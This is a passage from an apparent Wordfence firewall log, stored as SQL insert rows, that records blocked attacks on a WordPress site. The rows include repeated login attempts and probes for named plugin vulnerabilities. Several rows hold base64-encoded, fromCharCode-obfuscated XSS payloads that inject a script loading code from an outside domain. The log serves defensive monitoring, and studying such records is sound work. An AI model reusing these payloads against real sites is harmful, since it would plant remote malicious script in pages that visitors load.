Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0IGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7801,1564591076.247304,1564591075.103400,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgYXN5bmM9dHJ1ZSB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBudCA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTgsMTAxLDExNCwxMTYsNTQpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTAzLDk3LDk4LDExNCwxMDUsMTAxLDEwOCwxMDgsOTcsMTA4LDExMSwxMTgsMTAxLDk5LDk3LDExNiwxMTUsNDYsOTksMTExLDEwOSw0NywxMDgsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw1Niw1Nyw1NCw1Myw1Miw1MSw1MCwzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7929,1564614255.441056,1564614255.132700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7930,1564614254.266567,1564614253.940500,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7931,1564614253.068718,1564614252.736100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7800,1564591078.638515,1564591077.687600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7920,1564614265.985108,1564614265.627000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7921,1564614264.970557,1564614264.626600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7922,1564614263.906369,1564614263.534100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7811,1564591633.513924,1564591633.016600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfaGVhZGxpbmVd\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(7799,1564591080.814698,1564591079.491500,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7923,1564614262.373276,1564614262.049700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7798,1564591568.604971,1564591566.499300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7925,1564614260.233813,1564614259.898900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7924,1564614261.290550,1564614260.907400,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7797,1564591573.031374,1564591572.407300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7796,1564591574.269847,1564591573.759600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7795,1564591575.530225,1564591575.013700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7914,1564614272.736968,1564614272.374700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7810,1564591634.638488,1564591634.223800,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7806,1564591650.991168,1564591650.441000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7794,1564591578.185009,1564591577.667300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7897,1564614291.644837,1564614291.142200,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7898,1564614290.549228,1564614290.110000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7899,1564614289.301024,1564614288.955600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7900,1564614288.273752,1564614287.907200,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7901,1564614287.369426,1564614287.000500,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7902,1564614286.244941,1564614285.825300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7807,1564591649.749518,1564591649.318000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7903,1564614285.230348,1564614284.920000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7904,1564614284.251369,1564614283.899700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7905,1564614283.107035,1564614282.733600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 